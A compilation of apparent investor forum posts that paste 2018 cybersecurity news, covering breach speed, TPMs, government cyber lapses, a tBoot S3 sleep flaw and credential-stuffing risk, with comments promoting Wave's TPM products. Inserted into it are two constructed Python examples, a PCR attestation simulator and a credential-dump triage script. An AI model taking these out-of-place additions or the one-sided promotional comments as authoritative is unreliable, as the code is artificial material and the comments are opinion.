To do this, I led an extensive research study called “The Black Report” where we asked over a hundred hackers, penetration testers and incident responders about their capabilities and motivations.
The top finding should trouble all of us: half of our respondents said they can breach a federal or state target, locate critical value data, and exfiltrate it in under 15 hours.
You read that correctly, but I’ll reiterate. If a determined attacker decides they want your critical value data — whatever that term means to your organization — at 7 a.m., they’ll most likely get it by 10 p.m. the same day. As many industry-standard reports tell us, breached organizations normally don’t detect a breach for anywhere between 200-300 days. That’s an awful long time to go without acting, especially when the nation’s security is potentially at stake.
As policymakers, as participants in the workforce, as members of a thriving democracy, this situation is unacceptable. The reasons for this are manifold and require a complete shift in the way we defend our critical systems and data. As I read through the results, however, I began to wonder how our respondents felt about attacking the government compared with, for example, retail organizations. This was one of the differences between our 2018 research and what we produced in our inaugural report — a breakdown of responses by industry.
In something that passes for good news in this report, governments — federal, state and municipal — are ahead of the curve compared to other industries. While "only" half of our respondents could cause serious damage to the public sector within 15 hours, some in the private sector fared far worse. Networks within the retail and restaurant industries were lower-hanging fruit for bad actors.
These numbers bear scrutiny. Why are government targets more difficult to breach and steal information from? Are they “doing security” better than the other industries? That might be the case, and there’s evidence in the form of the 2017 Personal Data Notification and Protection Act, that our defense posture from a networked, IT perspective is on the path to stronger and more robust solutions.
Hopefully someday we’re writing another article and talking about how attackers need days and weeks to break into our systems, and detection is happening before they make off with our critical data. It won’t happen overnight, but it could become reality if we truly listen to the signals and craft responsible, agile policy that addresses today’s solutions and creates avenues to pursue answers to tomorrow’s.
Chris Pogue is a member of the U.S. Secret Service Electronic Crimes Task Force, the International Association of Chiefs of Police, and the International Association of Financial Crimes Investigators. He is also the head of services, security and partner Integrations at Nuix.
What the heck is trusted computing, anyway?
Viewing this article seems like: Whoa wait a minute!
https://blog.rivetz.com/what-the-heck-is-trusted-computing-anyway-2d063cf520cd
The idea behind trusted computing is that you can trust that your computer is your computer and is doing the things that you want it to do — and nothing more.
Pretty simple in theory. Less simple in practice.
Trusted computing got its official start in the late 1990s as an effort to get consumers to trust their personal computers. As the internet rose to prominence, people needed to have faith in these devices and the internet’s tubes to store and transmit your personally identifying information, credit card numbers, and other important data.
I personally recall expressing surprise that a friend would buy something online at the time — until he responded, “You ever buy anything over the phone? You trusted the person at the other end of the line, who was probably being paid minimum wage, didn’t you?” Huh. Now that you mention it …
The secure enclaves inside the processor chips inside desktops and laptops came out of the Trusted Computing Platform Alliance’s (TCPA’s) specifications for what actually would constitute a Trusted Computing Platform. In 2003, the TCPA was succeeded by the Trusted Computing Group, which exists to this day. (Related: When TCG was formed, Rivetz CEO Steven Sprague was CEO of Wave Systems, one of the organization’s earliest members.)
Open-source legend Richard Stallman saw this as a threat, however, dubbing trusted computing “treacherous computing” because he saw within it the ability to restrict access to certain types of content. By 2015, he altered his rhetoric a bit:
“At present, ‘Trusted Platform Modules’ are not being used for DRM at all, and there are reasons to think that it will not be feasible to use them for DRM. Ironically, this means that the only current uses of the ‘Trusted Platform Modules’ are the innocent secondary uses — for instance, to verify that no one has surreptitiously changed the system in a computer.
Therefore, we conclude that the ‘Trusted Platform Modules’ available for PCs are not dangerous, and there is no reason not to include one in a computer or support it in system software.”
Of course, those “innocent secondary uses” were the actual primary uses for the TPM.
So, since 2004, most devices shipped by the major manufacturers have included a Trusted Platform Module. The thing is, the user has to turn it on in order for it to be used. Most people don’t even know it exists, and even if they did, most wouldn’t know how to enable and use it.
That’s all very well and nice, this trip into the history books. But what does this mean, now?
One of the biggest problems in truly securing our devices is that security layers have historically been an impediment to getting people to actually use security. I mean, two-factor authentication apps have been around for years now, and how many people actually use them? And how many use them when not required by their employer?
Having to take extra steps to sign into an account or platform is annoying. It takes extra time — those precious few seconds.
That’s why the concept of trusted computing is so powerful — it has the potential to enable you to trust your device and know that it recognises you as you.
Trusted computing got a bump in interest this week when Intel announced its new Intel Security Essentials at the RSA security conference in San Francisco. The capabilities will help protect the trusted enclaves that are the root of trusted computing.
Intel’s announcement will make it easier for Rivetz to implement its trusted computing solutions in PCs, laptops and other devices with Intel processors.
“This standard set of capabilities will accelerate trusted computing as customers build solutions rooted in hardware-based protections,” Intel said in a press release. “Further, these capabilities, directly integrated into Intel silicon, are designed to improve the security posture of computing, lower the cost of deploying security solutions and minimize the impact of security on performance.”
Until now, the trusted computing technologies really haven’t focused on the average user. While Intel was really looking at its customers — the device manufacturers — when it announced this, it will be easier to bring this level of security to the average consumer.
As Steven told Tai Zen last fall, “in the past, these technologies have only been sold to the CISO, hoping they are going to deploy them inside a large enterprise.”
end of the article is at the link
UK cyber attack reporting set to be more streamlined
I would think that if the current cybersecurity has gotten us to the point listed in the article, then it's time for a change that works and is an improvement on the current cybersecurity. Cyber insurance should be mandatory for critical industries. Cyber insurance companies shouldn't have to pay cyber attack claims where TPMs weren't 100% activated across the network. imo. It seems that Wave could have an important role in this with its many excellent cybersecurity products.
https://www.computerweekly.com/news/252438915/UK-cyber-attack-reporting-set-to-be-more-streamlined
Government funding has been allocated to help streamline cyber attack reporting, according to the National Cyber Security Centre
Plans are under way to set up a single point for reporting cyber attacks in the UK to make it easier for organisations to do so, the National Cyber Security Centre (NCSC) has said.
In announcing a new cyber crime classification framework at the CyberUK 2018 conference in Manchester, the NCSC said any cyber attack that may have a national impact should be reported to the NCSC immediately, while individuals or businesses suffering a cyber attack below the national impact threshold should contact Action Fraud, the UK’s national fraud and cyber crime reporting centre.
Paul Chichester, director of operations at the NCSC, clarified the statement, saying there has been no change in the guidance on reporting, but that the new classification system will help organisations to understand more easily the nature of the incident they are dealing with.
The new framework expands the cyber incident categories from three to six, outlining the impact of each category, who responds to it and what they do.
The new categories of incident are: National cyber emergency, Highly significant incident, Significant incident, Substantial incident, Moderate incident and Localised incident.
“What we are trying to do with the new categorisation and guidance is give organisations more clarity to avoid any ambiguity,” Chichester told Computer Weekly.
“A key part of the work we are doing with law enforcement now and in the future will be to make it as clear as possible for citizens and business.
“In the coming year, we will be working with law enforcement to create a simpler way of reporting incidents and more victim-focused, so there is a single point to report to and the system will ensure that it gets to the right party, whether it is law enforcement or the NCSC.”
At present, said Chichester, there is already a behind-the-scenes capability to ensure that all reports are routed to the most appropriate teams, regardless of whether an incident is reported to the NCSC or Action Fraud.
National Cyber Strategy Coming Soon From White House
Will hardware security (100% turned on TPMs) be a part of this strategy? It would be a lot better than software security alone. imo.
https://www.nextgov.com/cybersecurity/2018/04/national-cyber-strategy-coming-soon-white-house/147382/
The Pentagon will update its cyber policies based on that strategy, an official says.
An updated national strategy that will guide how the Trump administration handles cyber defense and threats is being debated at the White House and “should be forthcoming in the near future,” a Pentagon official told lawmakers Wednesday.
That strategy, in turn, will inform a Defense Department cyber posture document that will likely come out in August, Assistant Secretary of Defense Kenneth Rapuano said.
Rapuano attributed the document’s delay to “evolving dynamics,” “a relatively new administration” and “competing views.”
Lawmakers have long complained that government cyber operations are hindered by the lack of an overarching cyber policy, though numerous such overarching policies failed to stem the tide of cyber strikes against the government during the Obama administration.
Though few details are known about the national cyber strategy, it’s likely to include priorities from a Trump cyber executive order issued in May 2017, former White House Homeland Security Adviser Tom Bossert has said.
Bossert resigned Tuesday, a day after National Security Adviser John Bolton took office.
The three pillars of that executive order were: improving the security of federal government computer networks; leveraging government resources to better secure critical infrastructure, such as hospitals, banks and financial firms; and establishing norms of good behavior in cyberspace and punishing bad behavior.
The Obama administration released a slew of guiding cybersecurity documents out of the White House, including a 2011 International Strategy for Cyberspace and a 2016 Cybersecurity National Action Plan. The Defense Department released its most recent cybersecurity strategy in 2015.
Rapuano was joined at the House Armed Services panel hearing by outgoing U.S. Cyber Command chief Adm. Michael Rogers, who plans to retire in the spring.
Rogers confirmed during the hearing that CYBERCOM teams are expected to reach full operational capability before a deadline at the close of the 2018 fiscal year.
Bankruptcy
Bankruptcy was closed on the 9th. Unsecured creditors are receiving or have received approximately 55% of what they wanted. The shareholders didn't receive anything. The final decree says that the case can be reopened. Those are my recollections that I believe to be accurate. Also there may be some distributions, but those may be for creditors. All it would take is a change in companies turning on an integral device called the TPM (using Wave's ERAS) to possibly change the current status of shareholders participating in having a share. Use the TPM, don't waste it. imo.
With trade war looming, Chinese cyberespionage may return
https://www.cyberscoop.com/us-china-trade-war-cyberattacks/
With the prospect of a trade war on the horizon between U.S. and China, cybersecurity and policy experts say government-backed cyberattacks between the two countries may spike after years of calm.
For the last two weeks, Chinese and U.S. government officials have been sparring over the potential creation of tariffs, which would place a tax on foreign exports coming into America.
“Potential tariff implementation could raise uncertainty over the possibility of a trade war between the two countries and possibly drive a further uptick in Chinese cyber espionage,” said Dmitri Alperovitch, chief technology officer of cybersecurity firm CrowdStrike, in an email to CyberScoop. “CrowdStrike has seen some pickup in Chinese cyber espionage activity over the last year, and we expect this trend to continue … There tends to be a shift in activity from nation-state adversaries when major geopolitical events occur.”
Historically, the Chinese government has successfully employed hackers to advance their economy; typically by stealing intellectual property from international companies, according to former U.S. officials. So experts say it would not be surprising to see economic motivations inspire another round of offensive cyber operations by Beijing, which maintains a tight grasp on China’s private technology sector.
The Trump administration already announced a long list of tariffs against China but they’ve yet to sign any into law. According to President Donald Trump, the broad purpose of these tariffs is to improve the U.S.’ existing trade deficit with China.
An accompanying Treasury Department report released alongside the tariffs last month explicitly called out China for cyber-enabled economic espionage.
“This is the first time China’s feeling large-scale trade repercussions directly tied to hacking,” explained Laura Galante, a senior fellow with D.C. think tank Atlantic Council. “[Chinese President Xi Jinping]’s focus is global now, he needs to diversify China’s economic might and markets. I’d expect that state hacking will mirror that shift.”
Analysts described that Treasury report as a significant development in the two countries’ complex relationship.
In response, the Communist Party of China recently announced its own tariff list — further escalating tension and temporarily throwing the U.S. stock market into upheaval.
“There are many unwritten and opaque channels that Beijing can and will use to show the U.S. that there are costs to confronting China,” said Samm Sacks, a Chinese government and technology analyst for the D.C. think tank Center for the Strategic and International Studies (CSIS). “Beijing may use cyber tools to retaliate that will be far more difficult to trace back to U.S. trade actions than tariffs, complicating efforts to negotiate an agreement.”
Contributing to the expected change is the fact that many of the structures which inhibited recent cyber conflict have been weakened.
While a 2015 agreement between then U.S. President Barack Obama and Xi had successfully curbed cyber-enabled economic espionage aimed at U.S. companies, the Trump administration’s aggressive approach to China puts the future of this delicate pact in flux.
One thing is for sure, however: China is certainly capable of responding in cyberspace.
“We assess that, although they have followed through with their commitment to restrain from intellectual property theft for commercial purposes, China is well positioned to resume at least some targeted activity if acquisitions of U.S. companies in high technology fields continues to be denied,” said Christopher Porter, chief intelligence strategist for cybersecurity company FireEye.
Still other experts cautioned any immediate expectations of retaliatory hacks.
“Beijing is unlikely in the near term to take steps that result in increased cyber activity against U.S. firms,” said Paul Triolo, practice head for geo-technology at the Eurasia Group. “IP theft is high on the list of White House grievances, and any obvious uptick would likely be detected by private cybersecurity firms.”
Triolo continued, “over the longer term, if the bilateral relationship goes south as a result of a tit for tat on trade, investment restrictions, visas, and other areas, Beijing perceives as efforts to contain China’s rise as a tech power, then the gloves could come off in other arenas, including cyberspace.”
Cybersecurity fiasco: Interior Department computers trying to talk to Russia, inspectors say
Use Wave's ERAS to enable all of the Interior Department's TPMs and put the department in a stronger position. A lot of their problems would evaporate. Use the TPM; don't waste it. It seems like this for as important as it is could fit in the budget for the short term. imo. A lot of companies should be doing the above anyway.
http://www.foxnews.com/politics/2018/04/05/cybersecurity-fiasco-interior-department-computers-trying-to-talk-to-russia-inspectors-say.html
Three years after Chinese hackers stole security clearance files and other sensitive personal information of some 22 million U.S. federal employees, cyber-defenses at the Department of Interior, which hosted White House Office of Personnel Management (OPM) servers targeted in the theft, were still unable to detect “some of the most basic threats” inside Interior’s computer networks — including malware actively trying to make contact with Russia.
In a 16-month examination of Interior’s ability to detect and respond to cyber-threats, evaluators from the department’s Office of Inspector General (OIG) also discovered that Interior’s technicians simply did not implement a sweeping array of mandatory, government-wide defensive measures ordered up after the disastrous OPM hack, didn’t investigate blocked intrusion attempts, and left “multiple” compromised computers on their network “for months at a time,” according to a redacted OIG report issued in March.
Ultra-sensitive security clearance files have since been moved to the Defense Department, but, among other things, the OIG report noted that:
• sensitive data at Interior could be taken out of the department’s networks “without detection.”
• network logs showed that a computer at the U.S. Geological Survey, an Interior bureau, was regularly trying to communicate with computers in Russia. The messages were blocked, but “the USGS facilities staff did not analyze the alerts.”
• dangerous or inappropriate behavior by network users — including the downloading of pornography and watching pirated videos on Russian and Ukrainian websites — was not investigated.
• computers discovered to be infected with malware were scrubbed as soon as possible and put back into use—meaning little or no effort went into examining the scope and nature of any such threats to the broader network. This happened, the OIG team noted, with one intruder they discovered themselves.
• simulated intrusions or ransomware attacks created by the examiners were carried out with increasing blatancy without a response—in the case of ransomware, for nearly a month.
• After the devastating OPM hack, which was discovered in April 2015, the department didn’t even publish a lessons-learned plan for its staffers based on the disaster. The OIG inspectors reported that Interior started to draft an “incident response plan” that month to deal with future intrusions, but “did not publish it until August 2017”— two months after the OIG team had finished their lengthy fieldwork.
• Distressingly, the report also notes that the department’s cybersecurity operations team was not privy to a list of Interior’s so-called “high-value IT assets” prepared by the Chief Information Officer, “due to its sensitive nature.”
In other words, the people tasked with protecting Interior’s most important information sites were not told what they were.
The report notes that such assets include “IT systems, facilities and data that are of particular interest to nation-state adversaries, such as foreign military and intelligence services.” They also often “contain sensitive data or support mission-critical Federal operations.”
In short, “there hasn’t been a lot done” in the wake of the devastating OPM hack, an official in the Inspector General’s office told Fox News. And, to make matters even worse, the OIG official said, “It’s likely that the same tests at other [federal] agencies would yield the same results.”
When OIG staffers presented 23 recommendations to fix the huge gaps in Interior’s digital defenses, the department’s top IT officials agreed — but said some of the most important fixes would take as many as five years, due to budgetary constraints.
“This is totally unacceptable and absurd,” says Jason Chaffetz, former head of the House Committee on Oversight and Government Reform, which in 2016 issued a scathing report on the lapses surrounding the earlier OPM security breach. (Chaffetz has left Congress and is now a Fox News contributor.)
“With one good trip to Best Buy we might be better off,” he added.
A top cybersecurity expert consulted by Fox News concurred, called the report “pretty damning” and evidence of “gross negligence” on the part of Interior’s top cyber-officials. The expert has a deep knowledge of federal information systems and experience with national security issues.
The long-term neglect, inertia and disarray concerning information security at Interior and other parts of the federal bureaucracy dates back to the Obama administration and beyond. But now they offer a steep challenge to the Trump administration, which is trying to impose its own cybersecurity agenda along with a sustained program of information technology-driven management modernization on the shambolic federal bureaucracy.
It is further complicated by previous federal efforts to centralize and rationalize the bureaucracy, including creation of a number of “shared business centers” across the government.
The business center at Interior offered — and still offers -- human resources services to 150 federal agencies, according to its website.
That is where OPM’s personnel servers were located. Though OPM itself was responsible for maintaining the security of its servers, according to the OIG report the hackers who stole personnel files “moved through the U.S. Office of Personnel Management environment through a trusted connection to the [Interior] Department’s data center, pivoting to human resources systems hosted by the Department.”
Such “lateral” connections across the government provided by the service centers are a “gold mine” to foreign intelligence hackers when penetrated, according to the cybersecurity expert consulted by Fox News.
In addition, databases at the Interior Department offer foreign hackers additional sensitive troves.
Interior’s nine bureaus may be best known for managing the nation’s national parks and vast land resources. But federal lands and waters also supply some 30 percent of U.S. oil and gas production, and the department’s bureau of reclamation is the country’s second-largest provider of electrical power. The U.S. Geological Survey monitors water resources and harvests satellite data on a global basis.
Geothermal, solar and wind resources are also concentrated on federal lands, and the department also oversees the safety and environmental soundness of offshore drilling.
In an executive order issued last May, President Trump explicitly declared that “the executive branch has for too long accepted antiquated and difficult-to-defend IT,” and that “known but unmitigated vulnerabilities are among the highest cybersecurity risks faced by executive departments and agencies.”
Heads of federal agencies were supposed to begin reporting on their “risk management measures” to deal with those problems within 90 days of the May 11, 2017, executive order -- while the OIG evaluation of Interior was still in progress. Field work on the Interior report ended a month later, in June.
Queried about the dismal evaluation of Interior’s cyber-defenses, a senior official in the White House Office of Management and Budget, which is in charge of the administration’s cybersecurity makeover, told Fox News that “we all acknowledge there are gaps across the Dot-Gov”-- shorthand for the federal government’s digital domain.
But, he added, “we are leveraging our authority to manage and eliminate these deficiencies. We have put down very ambitious markers and said, here is where we need to go.”
In particular, “we are laser-focused on cyber-security,” he said.
That imperative was reinforced, the official said, in the President’s Management Agenda, a document issued last month that laid out an ambitious, long-term plan for modernizing the federal government, with a sweeping upgrade of information technology as a key tool, along with a reorganization and upgrading of the federal work force and its management—especially the IT work force.
Money needs for the tech upgrade are supposed to come from a renewable, $500 million Technology Modernization Fund. In addition, the president’s proposed 2019 budget — which only happens insofar as Congress lets it — contains some $80 billion in IT and cybersecurity spending, ostensibly a 5.2 percent increase.
Even though the administration’s makeover plans are being pressed forward vigorously and as fast as possible, the presidential management agenda also warns that “deep-seated transformation takes time and will not happen in one or two years.”
The pressure to carry out all those ambitious tasks is supposed to come from, among other things, “continuous performance improvement,” by means of relentless monitoring of results. In cybersecurity, these include annual “performance audits,” carried out under the Federal Information Security Modernization Act and known as FISMA reports, along with an annual report card on information technology acquisitions.
In 2017, Interior’s heavily redacted FISMA account points to numerous holes in Interior’s defenses in a wide array of its departments, and an overall assessment that deficiencies were noted across all the conceptual areas of cybersecurity. The department’s score on the technology acquisition report card dropped from B+ to C in 2017.
In the shorter term, the administration is pinning its hopes on an aggressive move to cloud-based services and other technologies that will move government departments like Interior away from the “perimeter” defenses that the OIG report shows they might not be carrying out in the first place.
The strategy was outlined in yet another report to the president, on Federal IT modernization, issued last December.
The December report underlines that achieving its goals “will require an active shift in the mindset of agency leadership…IT practitioners, and oversight bodies.”
The evaluation of cyber-defenses at Interior is evidence that shift is not yet underway.
2.7 Million UK Businesses Wide Open to IoT Hacks
https://www.infosecurity-magazine.com/news/27m-uk-businesses-wide-open-iot/?utm_source=dlvr.it&utm_medium=twitter
An activated TPM on computers would help UK businesses be better protected than an inactivated TPM. The businesses just need to be informed. imo.
About 2.7 million businesses in the UK are leaving themselves vulnerable to internet of things (IoT) hacks.
ForeScout worked with CensusWide to conduct an independent survey of 500 CIOs and IT decisionmakers to see how prepared they are for IoT cybersecurity and the results were concerning: 47% admitted to not updating default passwords on all IoT devices when they are added to corporate networks; 15% admitted to not keeping security patches up to date.
With 5.7 million registered businesses in the UK, that means nearly 2.7 million are still leaving obvious vulnerabilities in the system for bad actors to exploit.
Making matters worse, UK businesses have a blind spot when it comes to the number of devices connected to their network. Only 54% of respondents had total confidence that they have full visibility and can identify every device on their network.
The visibility challenge for business is only set to increase, with 40% of respondents stating that they are planning to increase their operational technology (OT) spend on connected devices. However, 72% of IT managers are concerned about the security implications of adding additional OT devices to their company's network.
“The convergence between IT and OT is where businesses are looking to drive some major efficiency gains in 2018, but it makes the challenge of knowing exactly what devices are on your network that much harder,” explained Myles Bray, vice president of EMEA at ForeScout. “IoT has expanded the attack surface considerably for all firms, and without basic security hygiene it is easy for bad actors to gain a foothold and then move laterally on a network to reach high-value assets and cause business disruption. With GDPR just around the corner businesses need to act now.”
New Attack Vector Shows Dangers of S3 Sleep Mode
https://www.darkreading.com/vulnerabilities---threats/new-attack-vector-shows-dangers-of-s3-sleep-mode/d/d-id/1331445?_mc=KJH-Twitter-2018-03
Researchers at Black Hat Asia demonstrated how they can compromise the security of a machine as it powers down and wakes up.
Two researchers at Black Hat Asia last month gave computers a reason to sleep with one eye open in their demo of "S3 Sleep," a new attack vector used to subvert the Intel Trusted eXecution Environment (TXT). A flaw in Intel TXT lets hackers compromise a machine as it wakes up.
Intel TXT is the hardware-based functionality that supports the dynamic root-of-trust measurement (DRTM) and validates the platform's trustworthiness during boot and launch. This attack targets trusted boot (tBoot), a reference implementation of Intel TXT normally used in server environments. tBoot is an open-source project that protects the virtual machine monitor (VMM) and operating system.
Senior security researcher Seunghun Han and security researcher Jun-Hyeok Park, both with the National Security Research Institute of South Korea, presented an exploit of the "Lost Pointer" vulnerability (CVE-2017-16837), a software flaw in tBoot. This specific attack vector has never been reported, the two said at Black Hat, and attackers only need root privilege to do it.
Researchers have investigated Intel TXT and tBoot before, the researchers explained. However, previous studies have only focused on the boot process. This one focuses on the sleeping and waking up sequence of tBoot, and how attackers could exploit a machine as it reactivates.
Securing the sleep states
Sure, you could avoid this kind of attack by keeping machines running constantly, so Han started their Black Hat session by pointing out the financial reasons for sleep mode. "Power consumption is cost," Han explained. "Many companies worry about power consumption for their products because lower power consumption means a lower electricity fee."
Shutting down machines dramatically reduces power consumption; however, reactivating all of their components poses a security risk. As the computer wakes up, restarting its many parts takes time and security devices might be temporarily shut down for part of the process.
PC, laptop, and server environments supporting advanced configuration and power interface (ACPI) have six sleeping states to gradually reduce power consumption as the machine shuts down. The states go from S0 to S5 as the CPU, devices, and RAM go into full sleep mode. Power to the CPU and devices is cut off at the S3 phase of sleep.
"Because of power-off, their states need to be restored and reinitialized for waking up," says Han. "If we intercept sleep and waking up, we can do something interesting."
There are boot protection mechanisms, Park says. The secure boot of the Unified Extensible Firmware Interface (UEFI) checks a cryptographic signature of the binary prior to execution, and stops it if the executable file lacks a valid signature. "Measured boot" measures a hash of the binary prior to execution and stores the measurement to the Trusted Platform Module (TPM).
TPM is a hardware security device widely deployed in commercial devices, Han says. It's designed with a random number generator, encryption functions, and Platform Configuration Registers (PCRs), which store hashes and can be used to seal data like BitLocker, he explains.
The danger of sleep mode
When the system wakes up, it should turn on the security functions of the CPU and recover the PCRs of the TPM. However, because of the Lost Pointer flaw, tBoot doesn't measure all function pointers. Certain pointers in tBoot are not validated and can cause arbitrary code execution.
By exploiting the Lost Pointer flaw on a machine in S3 sleep mode, Han and Park found they can forge PCR values while a system sleeps and wakes up. If they can make the PCR variables whatever they want, attackers can subvert the Intel TXT security mechanism.
The researchers advise updating your tBoot to the latest version, or disabling the sleep feature in the BIOS, to protect against this kind of attack.
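To make the measured-boot mechanism the article describes concrete, here is an added example (not code from the article or from tBoot) that simulates PCR extend, replays a boot event log into PCR values, compares them with golden references the way an attestation verifier does, and checks that PCRs come back from S3 unchanged. The PCR assignments and measured blobs are constructed; the comparison only protects the platform while PCRs can be extended solely by measured code, which is exactly the assumption a forged post-resume PCR state breaks.

```python
"""Simulated PCR extend, event-log replay and verifier comparison.
Added example; PCR index usage and measured data are constructed."""
import hashlib
from typing import Dict, List, Tuple

PCR_INIT = b"\x00" * 32  # SHA-256 bank: every PCR starts at all zeros


def pcr_extend(pcr: bytes, measured: bytes) -> bytes:
    """TPM extend: PCR_new = H(PCR_old || H(measured)).
    Order matters and the operation cannot be reversed, which is what
    makes a chain of measurements trustworthy."""
    return hashlib.sha256(pcr + hashlib.sha256(measured).digest()).digest()


def replay_event_log(events: List[Tuple[int, bytes]]) -> Dict[int, bytes]:
    """Recompute every PCR from an ordered (pcr_index, measured_bytes) log."""
    pcrs: Dict[int, bytes] = {}
    for index, blob in events:
        pcrs[index] = pcr_extend(pcrs.get(index, PCR_INIT), blob)
    return pcrs


def verify_pcrs(reported: Dict[int, bytes], golden: Dict[int, bytes]) -> List[int]:
    """Return the PCR indexes whose reported value differs from the golden one."""
    return sorted(i for i, want in golden.items() if reported.get(i) != want)


def check_resume(before_sleep: Dict[int, bytes], after_resume: Dict[int, bytes]) -> List[int]:
    """After S3 the PCRs must be restored to exactly the pre-sleep values;
    any index that differs means the restored state cannot be trusted."""
    return sorted(i for i in set(before_sleep) | set(after_resume)
                  if before_sleep.get(i) != after_resume.get(i))


# Constructed boot log, loosely following DRTM PCR usage
# (PCR 17: SINIT and tboot, PCR 18: VMM/kernel, PCR 19: initrd).
TRUSTED_BOOT: List[Tuple[int, bytes]] = [
    (0, b"platform firmware (constructed)"),
    (17, b"SINIT ACM (constructed)"),
    (17, b"tboot module (constructed)"),
    (18, b"vmm kernel image (constructed)"),
    (19, b"initrd image (constructed)"),
]

# Same boot, except the VMM image was modified before launch.
TAMPERED_BOOT: List[Tuple[int, bytes]] = [
    (i, b"vmm kernel image (modified)" if i == 18 else blob) for i, blob in TRUSTED_BOOT
]

# Reference values a verifier would have recorded from a known-good boot.
GOLDEN: Dict[int, bytes] = replay_event_log(TRUSTED_BOOT)

if __name__ == "__main__":
    print("trusted boot mismatches :", verify_pcrs(replay_event_log(TRUSTED_BOOT), GOLDEN))
    print("tampered boot mismatches:", verify_pcrs(replay_event_log(TAMPERED_BOOT), GOLDEN))
    # A PCR that came back from sleep as zeros (not restored) is caught too.
    print("bad resume mismatches   :", check_resume(GOLDEN, {**GOLDEN, 18: PCR_INIT}))
```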
Wave is dead maybe, but I'm moving to higher ground in the coming days.
Are the ex-employees dead or even the present employees?
1.4B stolen passwords are free for the taking: What we know now
https://www.csoonline.com/article/3266607/password-security/1-4b-stolen-passwords-are-free-for-the-taking-what-we-know-now.html
See #5
The 2012 LinkedIn password breach, and others like it, are still paying dividends for criminals
More than a billion plaintext passwords from third-party data breaches are freely available on the internet, and the human tendency to reuse passwords across multiple services means these credentials, some of them years old, remain a serious threat, especially for smaller organizations.
For years password dumps have been traded on criminal forums, but in the last six months the sheer volume of passwords has driven the price down, to the point that, in 2017, someone dumped a collection of 1.4 billion previously exposed credentials online — for free.
The credentials remain available at no charge to anyone who knows how to use a search engine and a torrent client, no need to bother with Tor.
"This has never happened before in history," J. Tate, co-founder of Bits & Digits, says. "People used to say, where do you find the breach data? On the dark net. Now here it is publicly; use it for what you want to use it for."
While researching this story, CSO uncovered in the breached data thousands of work email addresses and old passwords belonging to current and former employees of IDG (CSO's parent company), as well as IDG affiliates. CSO worked with IDG's IT departments to determine if the exposed passwords were accurate at the time of breach and to potentially identify incidents of password reuse.
The trove of data also includes email addresses and passwords for people working at all levels of government in countries around the world including police, military, and spies. Even users with @nsa.gov email accounts appear in these data dumps, although the National Security Agency (NSA) assured CSO that the agency is not affected by these exposed credentials. But, then, few organizations, if any, consume the volume or quality of threat intel that the NSA does.
The Department of Homeland Security and Department of Justice, both with email addresses and passwords in the dump, told CSO their agencies were unaffected, as did Bank of America and Wells Fargo. Likewise, Google and Apple said that the hundreds of millions of Gmail and iCloud email accounts in the dump were unaffected, since both companies proactively search for this kind of breach data and make their users change their passwords.
Small to medium-sized businesses, though, do not typically consume the same kind of threat intel as major banks or government agencies or large tech companies, even to do basic things like using a torrent client to download third-party breach data and cross-referencing against a list of current employees.
This leaves large swaths of businesses and local governments at risk of password reuse attacks — known as "credential stuffing" attacks — well within reach of unsophisticated attackers. Defending against these trivial yet devastating attacks begins with accepting the realities of human nature and recognizing that blaming employees or customers for reusing passwords is futile. Far better to appreciate that people are terrible at choosing and remembering strong passwords and go from there.
skip:
Defending against credential stuffing attacks
Here are five basic steps every organization should follow.
5. Make 2FA mandatory
The best and most important of all these recommendations, however, is to use two-factor authentication, preferably with a hardware token. Password reuse is worthless if a user has 2FA enabled, and a hardware token is more secure than an app on a user's phone. 2FA all the things.
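The cross-referencing the article says small organisations rarely do, as an added example that is not part of the article: a constructed "email:password" dump is matched against a staff roster, and each hit is classed as merely exposed or as still reused, by verifying the dumped password against the account's current salted PBKDF2 hash. Domain names, accounts and passwords are all constructed.

```python
"""Triage a third-party credential dump against a staff directory.
Added example; every account, password and domain below is constructed."""
import hashlib
import hmac
import os
from typing import Dict, Iterable, Iterator, Tuple

# Constructed dump lines in the common "email:password" format, including
# a malformed line and a mixed-case address, both of which real dumps contain.
DUMP_LINES = [
    "alice@example.com:Summer2012!",
    "bob@example.com:linkedin123",
    "carol@other.example:hunter2",
    "malformed line without a separator",
    "DAVE@Example.com:Passw0rd",
]

ITERATIONS = 100_000  # PBKDF2-HMAC-SHA256 work factor for the constructed directory


def parse_dump(lines: Iterable[str]) -> Iterator[Tuple[str, str]]:
    """Yield (normalised_email, password); skip lines that are not credentials."""
    for line in lines:
        email, sep, password = line.partition(":")
        if not sep or "@" not in email:
            continue
        yield email.strip().lower(), password


def pbkdf2(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)


def make_record(password: str) -> Tuple[bytes, bytes]:
    """Store a fresh random salt and the derived hash, never the password."""
    salt = os.urandom(16)
    return salt, pbkdf2(password, salt)


# Constructed staff directory: email -> (salt, stored_hash).
STAFF: Dict[str, Tuple[bytes, bytes]] = {
    "alice@example.com": make_record("Summer2012!"),              # same as in the dump
    "bob@example.com": make_record("correct horse battery staple"),  # changed since
    "dave@example.com": make_record("Passw0rd"),                  # same as in the dump
}


def triage(dump_lines: Iterable[str], staff: Dict[str, Tuple[bytes, bytes]],
           company_domains: Tuple[str, ...] = ("example.com",)) -> Dict[str, str]:
    """Return email -> 'reused' or 'exposed' for current staff found in the dump.

    'reused'  : the dumped password still verifies against the current hash,
                so the account is open to credential stuffing right now.
    'exposed' : the address is in the dump but the password no longer matches;
                still worth a 2FA check, since the user may reuse it elsewhere.
    """
    findings: Dict[str, str] = {}
    for email, password in parse_dump(dump_lines):
        if email.split("@", 1)[1] not in company_domains or email not in staff:
            continue
        salt, stored = staff[email]
        reused = hmac.compare_digest(pbkdf2(password, salt), stored)
        # An address can appear several times; 'reused' must not be downgraded.
        if reused or email not in findings:
            findings[email] = "reused" if reused else "exposed"
    return findings


if __name__ == "__main__":
    for account, status in sorted(triage(DUMP_LINES, STAFF).items()):
        print(f"{account}: {status}")
```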
SAM.gov hackers used spearphishing, spoofing, credential theft
Wave - two factor authentication could solve a lot of problems.
https://www.fedscoop.com/sam-gov-hackers-used-spearphishing-spoofing-credential-theft/
Cybercrooks who stole federal payments by hacking contractor accounts on a GSA website used sophisticated spearphishing techniques to steal login credentials and then diverted payments to bank accounts they controlled, an executive of a contractor targeted in the scam told FedScoop.
It’s unclear how much the scammers have netted through their scheme, which is being investigated by the GSA inspector general and federal law enforcement. The inspector general’s office declined to comment, but sources familiar with the investigation told FedScoop that the cyberattacks that facilitated the fraud had been identified last year and were ongoing as recently as last week.
